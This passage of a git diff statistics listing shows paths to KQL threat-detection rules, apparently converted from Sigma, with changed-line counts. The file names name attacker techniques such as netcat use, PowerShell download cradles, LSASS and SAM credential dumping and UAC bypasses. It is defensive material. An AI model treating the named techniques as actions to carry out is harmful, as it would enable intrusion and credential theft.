...ly_suspicious_jwt_token_search_via_cli.kql | 0 ...ous_ntfs_symlink_behavior_modification.kql | 12 ++++++++++ ...ocument_executed_from_trusted_location.kql | 0 ...spicious_ping_copy_command_combination.kql | 0 ...y_suspicious_regsvr32_http_ftp_pattern.kql | 0 ...ly_suspicious_regsvr32_http_ip_pattern.kql | 0 ...tentially_suspicious_rundll32_activity.kql | 0 ...ous_rundll32_exe_execution_of_udl_file.kql | 0 .../potentially_suspicious_usage_of_qemu.kql | 0 ...tially_suspicious_webdav_lnk_execution.kql | 0 ...tially_suspicious_windows_app_activity.kql | 0 ...base64_encoded_frombase64string_cmdlet.kql | 0 .../powershell_base64_encoded_iex_cmdlet.kql | 0 ...wershell_base64_encoded_invoke_keyword.kql | 0 ...ell_base64_encoded_mppreference_cmdlet.kql | 0 ...ase64_encoded_reflective_assembly_load.kql | 0 .../powershell_base64_encoded_wmi_classes.kql | 0 ...wershell_defender_disable_scan_feature.kql | 0 .../powershell_defender_exclusion.kql | 0 ...fault_action_set_to_allow_or_noaction_.kql | 0 ...ershell_download_and_execution_cradles.kql | 0 .../powershell_download_pattern.kql | 0 ...executed_from_headless_conhost_process.kql | 0 ...with_potential_decryption_capabilities.kql | 0 ...owershell_get_clipboard_cmdlet_via_cli.kql | 0 .../powershell_get_process_lsass.kql | 0 ...owershell_inline_execution_from_a_file.kql | 0 ...dowsinstaller_com_from_remote_location.kql | 0 .../process_creation}/powershell_sam_copy.kql | 0 ...l_script_change_permission_via_set_acl.kql | 0 .../powershell_script_run_in_appdata.kql | 0 .../powershell_set_acl_on_windows_folder.kql | 0 ...ell_token_obfuscation_process_creation.kql | 0 ...ll_web_access_feature_enabled_via_dism.kql | 0 .../ppl_tampering_via_werfaultsecure.kql | 17 ++++++++++++++ .../printbrm_zip_creation_of_extraction.kql | 0 ...s_reconnaissance_via_commandline_tools.kql | 0 ...scalation_via_named_pipe_impersonation.kql | 0 .../process_creation}/procdump_execution.kql | 0 ...ss_access_via_trolleyexpress_exclusion.kql | 0 
...rocess_creation_using_sysnative_folder.kql | 0 ...n_from_a_potentially_suspicious_folder.kql | 0 .../process_launched_without_image_name.kql | 0 .../process_memory_dump_via_comsvcs_dll.kql | 0 .../process_memory_dump_via_dotnet_dump.kql | 0 ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 0 ...ocess_proxy_execution_via_squirrel_exe.kql | 0 .../process_reconnaissance_via_wmic_exe.kql | 0 .../proxy_execution_via_vshadow.kql | 0 .../proxy_execution_via_wuauclt_exe.kql | 0 .../process_creation}/psexec_execution.kql | 0 ...exec_paexec_escalation_to_local_system.kql | 0 ...hild_process_execution_as_local_system.kql | 0 .../psexec_service_execution.kql | 0 .../pua_3proxy_execution.kql | 0 .../pua_adfind_suspicious_execution.kql | 12 ++++++++++ .../pua_adidnsdump_execution.kql | 0 .../pua_advanced_ip_scanner_execution.kql | 0 .../pua_advanced_port_scanner_execution.kql | 0 .../pua_advancedrun_execution.kql | 0 .../pua_advancedrun_suspicious_execution.kql | 0 .../pua_chisel_tunneling_tool_execution.kql | 0 .../pua_cleanwipe_execution.kql | 0 .../pua_crassus_execution.kql | 0 .../pua_csexec_execution.kql | 0 .../pua_defendercheck_execution.kql | 0 .../pua_dit_snapshot_viewer.kql | 0 .../pua_fast_reverse_proxy_frp_execution.kql | 0 .../pua_iox_tunneling_tool_execution.kql | 0 .../pua_mouse_lock_execution.kql | 0 .../pua_netcat_suspicious_execution.kql | 0 .../process_creation}/pua_ngrok_execution.kql | 0 .../pua_nimgrab_execution.kql | 0 .../pua_nircmd_execution.kql | 0 .../pua_nircmd_execution_as_local_system.kql | 0 .../pua_nmap_zenmap_execution.kql | 0 .../pua_nps_tunneling_tool_execution.kql | 0 .../process_creation}/pua_nsudo_execution.kql | 0 .../pua_pingcastle_execution.kql | 0 ...ion_from_potentially_suspicious_parent.kql | 0 ...ential_pe_metadata_tamper_using_rcedit.kql | 0 .../pua_process_hacker_execution.kql | 0 .../pua_radmin_viewer_utility_execution.kql | 0 .../pua_rclone_execution.kql | 0 .../pua_restic_backup_tool_execution.kql | 0 
.../pua_runxcmd_execution.kql | 0 .../pua_seatbelt_execution.kql | 0 .../pua_softperfect_netscan_execution.kql | 0 ...vedirectory_enumeration_via_adfind_exe.kql | 0 .../pua_system_informer_execution.kql | 0 .../pua_trufflehog_execution.kql | 0 .../pua_webbrowserpassview_execution.kql | 0 .../pua_wsudo_suspicious_execution.kql | 0 .../pubprn_vbs_proxy_execution.kql | 0 ...ion_security_warning_disabled_in_excel.kql | 0 .../python_inline_command_execution.kql | 0 .../python_spawning_pretty_tty_on_windows.kql | 0 .../query_usage_to_exfil_data.kql | 0 .../quickassist_execution.kql | 0 .../process_creation}/raccine_uninstall.kql | 0 ...ge_with_password_and_compression_level.kql | 0 .../rdp_connection_allowed_via_netsh_exe.kql | 0 ...win32_terminalservicesetting_wmi_class.kql | 15 +++++++++++++ ...rt_forwarding_rule_added_via_netsh_exe.kql | 0 .../read_contents_from_stdin_via_cmd_exe.kql | 0 ...formance_counter_values_via_lodctr_exe.kql | 0 ...on_command_output_piped_to_findstr_exe.kql | 0 ...rmation_for_export_with_command_prompt.kql | 0 .../reg_add_suspicious_paths.kql | 0 ...ion_without_commandline_flags_or_files.kql | 0 .../regedit_as_trusted_installer.kql | 0 .../register_app_vbs_proxy_execution.kql | 0 ...stry_export_of_third_party_credentials.kql | 0 ...gistry_manipulation_via_wmi_stdregprov.kql | 0 ...stry_modification_attempt_via_vbscript.kql | 12 ++++++++++ .../registry_modification_via_regini_exe.kql | 0 ...ecution_with_suspicious_file_extension.kql | 0 ..._dll_execution_with_uncommon_extension.kql | 0 ...cution_from_highly_suspicious_location.kql | 0 ...ion_from_potential_suspicious_location.kql | 0 .../remote_access_tool_anydesk_execution.kql | 0 ...ydesk_execution_from_suspicious_folder.kql | 0 ...with_known_revoked_signing_certificate.kql | 0 ...ss_tool_anydesk_piped_password_via_cli.kql | 0 ...ccess_tool_anydesk_silent_installation.kql | 0 ...emote_access_tool_gotoassist_execution.kql | 0 .../remote_access_tool_logmein_execution.kql | 0 
...gent_command_execution_via_meshcentral.kql | 0 ...emote_access_tool_netsupport_execution.kql | 0 ..._potential_meshagent_execution_windows.kql | 0 ...ol_renamed_meshagent_execution_windows.kql | 0 ..._rurat_execution_from_unusual_location.kql | 0 ...te_access_tool_screenconnect_execution.kql | 0 ...l_screenconnect_installation_execution.kql | 0 ...al_suspicious_remote_command_execution.kql | 0 ...screenconnect_remote_command_execution.kql | 0 ...reenconnect_server_web_shell_execution.kql | 0 ...mote_access_tool_simple_help_execution.kql | 0 ...potentially_attacker_controlled_server.kql | 0 ...viewer_session_started_on_windows_host.kql | 0 ...mote_access_tool_ultraviewer_execution.kql | 0 ...chm_file_download_execution_via_hh_exe.kql | 0 .../remote_code_execute_via_winrm_vbs.kql | 0 ...download_via_desktopimgdownldr_utility.kql | 0 .../remote_file_download_via_findstr_exe.kql | 0 ...powershell_session_host_process_winrm_.kql | 0 .../remote_xsl_execution_via_msxsl_exe.kql | 0 ...ablement_abuse_via_atomictestharnesses.kql | 0 ...hosted_hta_file_executed_via_mshta_exe.kql | 0 .../renamed_autohotkey_exe_execution.kql | 0 .../renamed_boinc_client_execution.kql | 0 .../renamed_browsercore_exe_execution.kql | 0 .../renamed_cloudflared_exe_execution.kql | 0 .../renamed_createdump_utility_execution.kql | 0 .../renamed_curl_exe_execution.kql | 0 .../renamed_ftp_exe_execution.kql | 0 .../renamed_gpg_exe_execution.kql | 0 .../renamed_jusched_exe_execution.kql | 0 .../renamed_mavinject_exe_execution.kql | 0 .../renamed_megasync_execution.kql | 0 .../renamed_microsoft_teams_execution.kql | 0 .../renamed_msdt_exe_execution.kql | 0 .../renamed_nircmd_exe_execution.kql | 0 .../renamed_office_binary_execution.kql | 0 .../renamed_pingcastle_binary_execution.kql | 0 .../renamed_plink_execution.kql | 0 .../renamed_procdump_execution.kql | 0 .../renamed_psexec_service_execution.kql | 0 ...d_remote_utilities_rat_rurat_execution.kql | 0 .../renamed_schtasks_execution.kql | 14 
++++++++++++ ...named_sysinternals_debugview_execution.kql | 0 ...renamed_sysinternals_sdelete_execution.kql | 0 ...ed_visual_studio_code_tunnel_execution.kql | 0 .../renamed_vmnat_exe_execution.kql | 0 .../renamed_whoami_execution.kql | 0 .../process_creation}/replace_exe_usage.kql | 0 ...sponse_file_execution_via_odbcconf_exe.kql | 0 ..._registry_value_tampering_proccreation.kql | 0 ...tificate_installed_from_susp_locations.kql | 0 .../ruby_inline_command_execution.kql | 0 ...sk_execution_as_configured_in_registry.kql | 0 .../run_powershell_script_from_ads.kql | 0 ...ll_script_from_redirected_input_stream.kql | 0 ..._execution_with_uncommon_dll_extension.kql | 0 ...ecution_without_commandline_parameters.kql | 0 .../rundll32_execution_without_parameters.kql | 0 .../rundll32_installscreensaver_execution.kql | 0 .../rundll32_registered_com_objects.kql | 0 .../rundll32_spawned_via_explorer_exe.kql | 0 .../rundll32_spawning_explorer.kql | 0 .../rundll32_unc_path_execution.kql | 0 .../runmru_registry_key_deletion.kql | 0 ...eboot_registry_key_deleted_via_reg_exe.kql | 0 ...ially_suspicious_path_via_schtasks_exe.kql | 0 ...ation_masquerading_as_system_processes.kql | 0 ...heduled_task_creation_via_schtasks_exe.kql | 0 ...th_curl_and_powershell_execution_combo.kql | 0 ...xecuting_encoded_payload_from_registry.kql | 0 ...d_task_executing_payload_from_registry.kql | 0 ...or_modification_with_system_privileges.kql | 0 .../schtasks_from_suspicious_folders.kql | 0 .../screen_capture_activity_via_psr_exe.kql | 0 ...script_event_consumer_spawning_process.kql | 0 ...reter_execution_from_suspicious_folder.kql | 0 ...g_commandline_process_spawned_regsvr32.kql | 0 .../sdclt_child_processes.kql | 0 ...nhost_calling_suspicious_child_process.kql | 0 ...sabled_via_minint_registry_key_process.kql | 0 ..._privileges_enumeration_via_whoami_exe.kql | 0 .../security_service_disabled_via_reg_exe.kql | 0 ...y_tools_keyword_lookup_via_findstr_exe.kql | 0 
...e_from_potentially_suspicious_location.kql | 0 ...e_access_via_volume_shadow_copy_backup.kql | 0 .../sensitive_file_dump_via_wbadmin_exe.kql | 0 ...e_recovery_from_backup_via_wbadmin_exe.kql | 0 ...dacl_abuse_to_hide_services_via_sc_exe.kql | 0 .../service_reconnaissance_via_wmic_exe.kql | 0 ...rvice_registry_key_deleted_via_reg_exe.kql | 0 ...curity_descriptor_tampering_via_sc_exe.kql | 0 .../service_started_stopped_via_wmic_exe.kql | 0 ...type_change_via_powershell_set_service.kql | 0 .../service_startuptype_change_via_sc_exe.kql | 0 ...files_as_system_files_using_attrib_exe.kql | 0 ...p16_exe_execution_with_custom_lst_file.kql | 0 ...tion_using_operating_systems_utilities.kql | 0 ...tion_using_operating_systems_utilities.kql | 0 ..._and_session_enumeration_using_net_exe.kql | 0 ..._dll_execution_in_suspicious_directory.kql | 0 .../shell_process_spawned_by_java_exe.kql | 0 .../process_creation}/shimcache_flush.kql | 0 ...ent_tools_powershell_session_detection.kql | 0 ...sqlite_chromium_profile_data_db_access.kql | 0 .../sqlite_firefox_profile_data_db_access.kql | 0 .../start_of_nt_virtual_dos_machine.kql | 0 .../start_windows_service_via_net_exe.kql | 0 .../sticky_key_like_backdoor_execution.kql | 0 .../stop_windows_service_via_net_exe.kql | 0 ...ws_service_via_powershell_stop_service.kql | 0 .../stop_windows_service_via_sc_exe.kql | 0 .../suspect_svchost_activity.kql | 0 ...ctory_database_snapshot_via_adexplorer.kql | 0 ...spicious_advpack_call_via_rundll32_exe.kql | 0 ...ous_agentexecutor_powershell_execution.kql | 0 ...ious_autorun_registry_modified_via_wmi.kql | 0 ...ectory_spawned_from_office_application.kql | 0 ..._access_agent_update_utility_execution.kql | 0 ...us_cabinet_file_execution_via_msdt_exe.kql | 0 .../suspicious_calculator_usage.kql | 0 ...suspicious_certreq_command_to_download.kql | 0 ...icious_child_process_created_as_system.kql | 0 ...icious_child_process_of_aspnetcompiler.kql | 0 ...suspicious_child_process_of_bginfo_exe.kql | 0 
...d_process_of_manage_engine_servicedesk.kql | 0 ...suspicious_child_process_of_sql_server.kql | 0 ...icious_child_process_of_veeam_dabatase.kql | 0 ...suspicious_child_process_of_wermgr_exe.kql | 0 ...nstance_executed_with_custom_extension.kql | 0 ...ous_clickfix_filefix_execution_pattern.kql | 13 +++++++++++ .../suspicious_codepage_switch_via_chcp.kql | 0 ...nd_patterns_in_scheduled_task_creation.kql | 0 .../suspicious_control_panel_dll_load.kql | 0 ...cious_copy_from_or_to_system_directory.kql | 2 +- .../suspicious_csi_exe_usage.kql | 0 .../suspicious_curl_exe_download.kql | 0 .../suspicious_customshellhost_execution.kql | 0 ...spicious_debugger_registration_cmdline.kql | 0 .../suspicious_desktopimgdownldr_command.kql | 0 ...diantz_alternate_data_stream_execution.kql | 0 ..._download_and_compress_into_a_cab_file.kql | 0 .../suspicious_dll_loaded_via_certoc_exe.kql | 0 ...icious_double_extension_file_execution.kql | 0 ..._download_from_direct_ip_via_bitsadmin.kql | 0 ...rom_file_sharing_website_via_bitsadmin.kql | 0 ...suspicious_download_from_office_domain.kql | 0 .../suspicious_download_via_certutil_exe.kql | 0 ...iver_dll_installation_via_odbcconf_exe.kql | 0 ...spicious_driver_install_by_pnputil_exe.kql | 0 .../suspicious_dumpminitool_execution.kql | 0 ...s_electron_application_child_processes.kql | 0 ...reflection_assembly_load_function_call.kql | 0 ...icious_encoded_powershell_command_line.kql | 0 ...aring_or_configuration_change_activity.kql | 0 ...xecution_from_outlook_temporary_folder.kql | 0 ...cious_execution_location_of_wermgr_exe.kql | 0 .../suspicious_execution_of_hostname.kql | 0 ...s_execution_of_installutil_without_log.kql | 0 ...us_execution_of_powershell_with_base64.kql | 0 .../suspicious_execution_of_shutdown.kql | 0 ...cious_execution_of_shutdown_to_log_out.kql | 0 .../suspicious_execution_of_systeminfo.kql | 0 ...th_whitespace_padding_clickfix_filefix.kql | 2 +- ...trac32_alternate_data_stream_execution.kql | 0 
.../suspicious_extrac32_execution.kql | 0 ..._characteristics_due_to_missing_fields.kql | 0 ..._from_file_sharing_domain_via_curl_exe.kql | 0 ..._from_file_sharing_domain_via_wget_exe.kql | 0 ...ous_file_download_from_ip_via_curl_exe.kql | 0 ...ous_file_download_from_ip_via_wget_exe.kql | 0 ...le_download_from_ip_via_wget_exe_paths.kql | 0 ...loaded_from_direct_ip_via_certutil_exe.kql | 0 ..._file_sharing_website_via_certutil_exe.kql | 0 ...ile_encoded_to_base64_via_certutil_exe.kql | 0 ...tion_from_internet_hosted_webdav_share.kql | 0 .../suspicious_filefix_execution_pattern.kql | 15 +++++++++++++ ...usage_on_gzip_archive_process_creation.kql | 0 .../suspicious_git_clone.kql | 0 ...cious_greedy_compression_using_rar_exe.kql | 0 ..._reconnaissance_activity_using_net_exe.kql | 0 .../suspicious_grpconv_execution.kql | 0 .../suspicious_gup_usage.kql | 0 .../suspicious_hh_exe_execution.kql | 0 ...h_integritylevel_conhost_legacy_option.kql | 0 .../suspicious_hwp_sub_processes.kql | 0 .../suspicious_iis_module_registration.kql | 0 ...iis_url_globalrules_rewrite_via_appcmd.kql | 0 ...suspicious_invoke_webrequest_execution.kql | 0 ...oke_webrequest_execution_with_directip.kql | 0 ...ous_javascript_execution_via_mshta_exe.kql | 0 ...icious_kerberos_ticket_request_via_cli.kql | 15 +++++++++++++ .../suspicious_kernel_dump_using_dtrace.kql | 0 .../suspicious_key_manager_access.kql | 0 ...ine_padding_with_whitespace_characters.kql | 0 ...lation_of_default_accounts_via_net_exe.kql | 0 ...picious_microsoft_office_child_process.kql | 0 ...icious_microsoft_onenote_child_process.kql | 0 ...icious_modification_of_scheduled_tasks.kql | 0 ...d_execution_by_uncommon_parent_process.kql | 0 .../suspicious_msdt_parent_process.kql | 0 .../suspicious_mshta_child_process.kql | 0 ...uspicious_mshta_exe_execution_patterns.kql | 0 .../suspicious_msiexec_embedding_parent.kql | 0 ...spicious_msiexec_execute_arbitrary_dll.kql | 0 ...xec_quiet_install_from_remote_location.kql | 0 
...stsc_exe_execution_with_local_rdp_file.kql | 0 .../suspicious_network_command.kql | 0 .../suspicious_new_service_creation.kql | 0 ...ication_on_the_printer_spooler_service.kql | 0 .../suspicious_obfuscated_powershell_code.kql | 0 .../suspicious_outlook_child_process.kql | 0 ...parent_double_extension_file_execution.kql | 0 ...etoolboxcmd_exe_vm_state_change_script.kql | 0 ...uspicious_ping_del_command_combination.kql | 0 .../suspicious_plink_port_forwarding.kql | 0 ...xecution_to_change_lock_screen_timeout.kql | 0 ...owershell_download_and_execute_pattern.kql | 0 ...us_powershell_encoded_command_patterns.kql | 0 ...ious_powershell_iex_execution_patterns.kql | 0 ...l_invocations_specific_processcreation.kql | 0 ...ous_powershell_mailbox_export_to_share.kql | 0 ...picious_powershell_parameter_substring.kql | 0 .../suspicious_powershell_parent_process.kql | 0 ...spicious_process_by_web_server_process.kql | 0 ...uspicious_process_created_via_wmic_exe.kql | 0 ...execution_from_fake_recycle_bin_folder.kql | 0 ...us_process_masquerading_as_svchost_exe.kql | 0 .../suspicious_process_parents.kql | 0 ...icious_process_patterns_ntds_dit_exfil.kql | 0 .../suspicious_process_start_locations.kql | 0 ...spicious_processes_spawned_by_java_exe.kql | 0 .../suspicious_processes_spawned_by_winrm.kql | 0 ..._whitelisted_in_firewall_via_netsh_exe.kql | 0 .../suspicious_program_names.kql | 0 ...uspicious_provlaunch_exe_child_process.kql | 0 .../suspicious_query_of_machineguid.kql | 0 .../suspicious_rasdial_activity.kql | 0 .../suspicious_rdp_redirect_using_tscon.kql | 0 ...vity_using_get_localgroupmember_cmdlet.kql | 0 ...nce_activity_via_gathernetworkinfo_vbs.kql | 0 .../suspicious_recursive_takeown.kql | 0 ...cious_redirection_to_local_admin_share.kql | 0 .../suspicious_reg_add_bitlocker.kql | 0 .../suspicious_reg_add_open_command.kql | 0 ...y_modification_from_ads_via_regini_exe.kql | 0 ...s_regsvr32_execution_from_remote_share.kql | 0 ...ious_remote_child_process_from_outlook.kql 
| 0 ...sponse_file_execution_via_odbcconf_exe.kql | 0 ...suspicious_runas_like_flag_combination.kql | 0 ...us_rundll32_activity_invoking_sys_file.kql | 0 ...undll32_execution_with_image_extension.kql | 0 ...ious_rundll32_invoking_inline_vbscript.kql | 0 ...picious_rundll32_setupapi_dll_activity.kql | 0 .../suspicious_runscripthelper_exe.kql | 0 .../suspicious_scan_loop_network.kql | 0 ...ed_task_creation_involving_temp_folder.kql | 0 ...task_creation_via_masqueraded_xml_file.kql | 0 ...suspicious_scheduled_task_name_as_guid.kql | 0 ...ious_schtasks_execution_appdata_folder.kql | 0 ...sks_schedule_type_with_high_privileges.kql | 0 .../suspicious_schtasks_schedule_types.kql | 0 ...uspicious_screensave_change_by_reg_exe.kql | 0 ...ious_script_execution_from_temp_folder.kql | 0 .../suspicious_serv_u_process_pattern.kql | 0 .../suspicious_service_binary_directory.kql | 0 ...cl_modification_via_set_service_cmdlet.kql | 0 .../suspicious_service_path_modification.kql | 0 ...ious_shellexec_rundll_call_via_ordinal.kql | 0 ...s_shells_spawn_by_java_utility_keytool.kql | 0 ...us_speech_runtime_binary_child_process.kql | 0 .../suspicious_splwow64_without_params.kql | 0 ...suspicious_spool_service_child_process.kql | 0 .../suspicious_sysaidserver_child.kql | 0 ...uspicious_system_user_process_creation.kql | 0 ...ious_sysvol_domain_group_policy_access.kql | 0 .../suspicious_tscon_start_as_system.kql | 0 .../suspicious_ultravnc_execution.kql | 0 ...indows_defender_feature_via_powershell.kql | 0 ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 0 ...with_recursive_directory_search_in_cmd.kql | 12 ++++++++++ .../suspicious_usage_of_shellexec_rundll.kql | 0 ...ious_use_of_csharp_interactive_console.kql | 0 .../suspicious_use_of_psloglist.kql | 0 .../suspicious_userinit_child_process.kql | 0 .../suspicious_vboxdrvinst_exe_parameters.kql | 0 .../suspicious_velociraptor_child_process.kql | 0 ...t_command_with_agentextensionpath_load.kql | 0 ...bdav_client_execution_via_rundll32_exe.kql | 
0 .../suspicious_where_execution.kql | 0 ...der_folder_exclusion_added_via_reg_exe.kql | 0 ...der_registry_key_tampering_via_reg_exe.kql | 0 .../suspicious_windows_service_tampering.kql | 0 ...race_etw_session_tamper_via_logman_exe.kql | 0 ...ous_windows_update_agent_empty_cmdline.kql | 0 ...icious_windowsterminal_child_processes.kql | 0 ...ious_wmic_execution_via_office_process.kql | 0 .../suspicious_wmiprvse_child_process.kql | 0 ...cious_workstation_locking_via_rundll32.kql | 0 ...icious_x509enrollment_process_creation.kql | 0 ...picious_xor_encoded_powershell_command.kql | 0 .../suspicious_zipexec_execution.kql | 0 ...rver_execute_arbitrary_powershell_code.kql | 0 ..._vbs_execute_arbitrary_powershell_code.kql | 0 .../sysinternals_psservice_execution.kql | 0 .../sysinternals_pssuspend_execution.kql | 0 ...ternals_pssuspend_suspicious_execution.kql | 0 .../sysmon_configuration_update.kql | 0 ...ault_driver_altitude_using_findstr_exe.kql | 0 .../sysmon_driver_unloaded_via_fltmc_exe.kql | 0 .../sysprep_on_appdata_folder.kql | 0 ...and_volume_reconnaissance_via_wmic_exe.kql | 0 ...system_file_execution_location_anomaly.kql | 2 +- ...rmation_discovery_via_registry_queries.kql | 2 +- ...work_connections_discovery_via_net_exe.kql | 0 ...r_windows_defender_remove_mppreference.kql | 0 .../tap_installer_execution.kql | 0 .../taskkill_symantec_endpoint_protection.kql | 0 .../taskmgr_as_local_system.kql | 0 .../tasks_folder_evasion.kql | 0 .../terminal_service_process_spawn.kql | 0 .../time_travel_debugging_utility_usage.kql | 0 .../tor_client_browser_execution.kql | 2 +- .../trustedpath_uac_bypass_pattern.kql | 0 ...ss_abusing_winsat_path_parsing_process.kql | 0 ...ac_bypass_tools_using_computerdefaults.kql | 0 .../uac_bypass_using_changepk_and_slui.kql | 0 ...ass_using_consent_and_comctl32_process.kql | 0 .../uac_bypass_using_disk_cleanup.kql | 0 .../uac_bypass_using_dismhost.kql | 0 ..._bypass_using_event_viewer_recentviews.kql | 0 
.../uac_bypass_using_idiagnostic_profile.kql | 0 .../uac_bypass_using_ieinstal_process.kql | 0 ...ng_msconfig_token_modification_process.kql | 0 ...ypass_using_ntfs_reparse_point_process.kql | 0 .../uac_bypass_using_pkgmgr_and_dism.kql | 0 ...ass_using_windows_media_player_process.kql | 0 .../uac_bypass_via_icmluautil.kql | 0 ...ss_via_windows_firewall_snap_in_hijack.kql | 0 .../process_creation}/uac_bypass_wsreset.kql | 0 ...persistence_via_wpbbin_processcreation.kql | 0 ...on_addinutil_exe_commandline_execution.kql | 0 ...pplications_execution_via_atbroker_exe.kql | 0 ...ncommon_child_process_of_addinutil_exe.kql | 0 .../uncommon_child_process_of_appvlp_exe.kql | 0 .../uncommon_child_process_of_bginfo_exe.kql | 0 ...ommon_child_process_of_defaultpack_exe.kql | 0 .../uncommon_child_process_of_setres_exe.kql | 0 ..._child_process_spawned_by_odbcconf_exe.kql | 0 ...uncommon_child_processes_of_sndvol_exe.kql | 0 ..._database_installation_via_sdbinst_exe.kql | 0 ..._filesystem_load_attempt_by_format_com.kql | 0 .../uncommon_link_exe_parent_process.kql | 0 ..._one_time_only_scheduled_task_at_00_00.kql | 0 .../uncommon_sigverif_exe_child_process.kql | 0 ...ncommon_svchost_command_line_parameter.kql | 13 +++++++++++ .../uncommon_svchost_parent_process.kql | 0 ...tem_information_discovery_via_wmic_exe.kql | 0 .../uncommon_userinit_child_process.kql | 0 .../uninstall_crowdstrike_falcon_sensor.kql | 0 .../uninstall_sysinternals_sysmon.kql | 0 .../unmount_share_via_net_exe.kql | 0 ...allation_attempt_using_add_appxpackage.kql | 0 .../unusual_child_process_of_dns_exe.kql | 0 .../unusual_parent_process_for_cmd_exe.kql | 0 ...ge_of_web_request_commands_and_cmdlets.kql | 0 .../use_icacls_to_hide_file_to_everyone.kql | 0 .../use_ntfs_short_name_in_command_line.kql | 0 .../use_ntfs_short_name_in_image.kql | 0 .../use_of_fsharp_interpreters.kql | 0 .../process_creation}/use_of_openconsole.kql | 0 .../use_of_pcalua_for_execution.kql | 0 .../process_creation}/use_of_remote_exe.kql | 
0 .../use_of_scriptrunner_exe.kql | 0 ...use_of_the_sftp_exe_binary_as_a_lolbin.kql | 0 .../use_of_ttdinject_exe.kql | 0 ...use_of_ultravnc_remote_access_software.kql | 0 .../use_of_visualuiaverifynative_exe.kql | 0 .../use_of_vsiisexelauncher_exe.kql | 0 .../use_of_w32tm_as_timer.kql | 0 .../process_creation}/use_of_wfc_exe.kql | 0 .../use_short_name_path_in_image.kql | 0 .../user_added_to_highly_privileged_group.kql | 0 ...er_added_to_local_administrators_group.kql | 0 ...er_added_to_remote_desktop_users_group.kql | 0 ...overy_and_export_via_get_aduser_cmdlet.kql | 0 .../using_settingsynchost_exe_as_lolbin.kql | 0 .../utilityfunctions_ps1_proxy_dll.kql | 0 ...veeam_backup_database_suspicious_query.kql | 0 ...tabase_credentials_dump_via_sqlcmd_exe.kql | 0 .../verclsid_exe_runs_com_object.kql | 0 ...driver_installation_or_starting_of_vms.kql | 0 ...sual_basic_command_line_compiler_usage.kql | 0 .../visual_studio_code_tunnel_execution.kql | 0 ...tudio_code_tunnel_service_installation.kql | 0 ...ual_studio_code_tunnel_shell_execution.kql | 0 ...pressanykey_arbitrary_binary_execution.kql | 0 ...ejstools_pressanykey_renamed_execution.kql | 0 .../vmtoolsd_suspicious_child_process.kql | 0 ...shadowcopy_symlink_creation_via_mklink.kql | 0 ...ab_execution_from_non_default_location.kql | 0 ...bmig_unusual_parent_or_child_processes.kql | 0 .../weak_or_abused_passwords_in_cli.kql | 0 ...bdav_client_execution_via_rundll32_exe.kql | 0 ...l_detection_with_command_line_keywords.kql | 0 .../webshell_hacking_activity_patterns.kql | 0 .../webshell_tool_reconnaissance_activity.kql | 0 .../process_creation}/whoami_as_parameter.kql | 0 .../whoami_exe_execution_anomaly.kql | 0 ..._exe_execution_from_privileged_process.kql | 0 ...hoami_exe_execution_with_output_option.kql | 0 .../windows_admin_share_mount_via_net_exe.kql | 0 ...windows_backup_deleted_via_wbadmin_exe.kql | 0 ...credential_manager_access_via_vaultcmd.kql | 0 ...fault_domain_gpo_modification_via_gpme.kql | 13 +++++++++++ 
.../windows_defender_context_menu_removed.kql | 0 ...dows_defender_definition_files_removed.kql | 0 ...ndows_firewall_disabled_via_powershell.kql | 0 ...ix_updates_reconnaissance_via_wmic_exe.kql | 0 ..._hosted_webdav_share_mount_via_net_exe.kql | 0 .../windows_kernel_debugger_execution.kql | 0 ..._processes_suspicious_parent_directory.kql | 0 ...ows_recall_feature_enabled_via_reg_exe.kql | 0 ...very_environment_disabled_via_reagentc.kql | 0 .../windows_share_mount_via_net_exe.kql | 0 .../winrar_compressing_dump_files.kql | 0 ...inrar_execution_in_non_standard_folder.kql | 0 .../winrs_local_command_execution.kql | 0 ...exe_uncommon_argument_or_child_process.kql | 0 .../wmi_backdoor_exchange_transport_agent.kql | 0 .../wmi_persistence_script_event_consumer.kql | 0 .../wmic_remote_command_execution.kql | 0 .../wmiprvse_spawned_a_process.kql | 0 .../write_protect_for_storage_disabled.kql | 0 ...of_malicious_files_to_the_fonts_folder.kql | 0 .../wscript_shell_run_in_commandline.kql | 0 .../wsl_child_process_anomaly.kql | 0 .../wsl_kali_linux_usage.kql | 0 ...process_located_in_suspicious_location.kql | 0 ...mon_locations_via_presentationhost_exe.kql | 0 .../xsl_script_execution_via_wmic_exe.kql | 0 ...xe_execution_from_non_default_location.kql | 0 ...ence_via_disk_cleanup_handler_registry.kql | 0 ...scan_shellex_context_menu_registry_key.kql | 0 ...t_guard_protectedfolders_list_registry.kql | 0 ...removal_of_amsi_provider_registry_keys.kql | 0 ...x_value_to_hide_schedule_task_registry.kql | 2 +- ..._potential_com_hijacking_registry_keys.kql | 0 ...d_value_to_hide_schedule_task_registry.kql | 2 +- .../runmru_registry_key_deletion_registry.kql | 0 ...nt_connection_history_cleared_registry.kql | 0 ...ed_disableaidataanalysis_value_deleted.kql | 0 .../atbroker_registry_change.kql | 0 .../cmstp_execution_registry_event.kql | 0 ..._local_hidden_user_account_by_registry.kql | 2 +- .../registry_event}/dll_load_via_lsass.kql | 0 ...nymous_computer_allowanonymouscallback.kql | 0 
...entutl_volume_shadow_copy_service_keys.kql | 0 ...nmanager_service_installation_registry.kql | 0 .../narrator_s_feedback_hub_persistence.kql | 0 .../netntlm_downgrade_attack_registry.kql | 0 .../new_portproxy_registry_entry_added.kql | 0 ...office_application_startup_office_test.kql | 0 .../path_to_screensaver_binary_modified.kql | 0 ..._via_lsass_silentprocessexit_technique.kql | 0 .../potential_qakbot_registry_activity.kql | 0 ..._winnti_playbook_registry_manipulation.kql | 0 .../registry_entries_for_azorult_malware.kql | 0 ...ng_by_potentially_suspicious_processes.kql | 14 ++++++++++++ ...un_once_task_configuration_in_registry.kql | 0 ...rovider_ssp_added_to_lsa_configuration.kql | 0 .../shell_open_registry_keys_manipulation.kql | 0 ...ticky_key_like_backdoor_usage_registry.kql | 0 ...uspicious_camera_and_microphone_access.kql | 0 .../suspicious_run_key_from_download.kql | 0 .../uac_bypass_via_wsreset.kql | 0 ...digest_credguard_registry_modification.kql | 0 .../windows_credential_editor_registry.kql | 0 ...hreat_severity_default_action_modified.kql | 0 ...ows_registry_trust_record_modification.kql | 0 .../winekey_registry_modification.kql | 0 ..._windows_security_center_notifications.kql | 0 ...ugger_entry_to_aedebug_for_persistence.kql | 0 ...ger_entry_to_hangs_key_for_persistence.kql | 0 .../add_disallowrun_execution_to_registry.kql | 0 ...d_port_monitor_persistence_in_registry.kql | 0 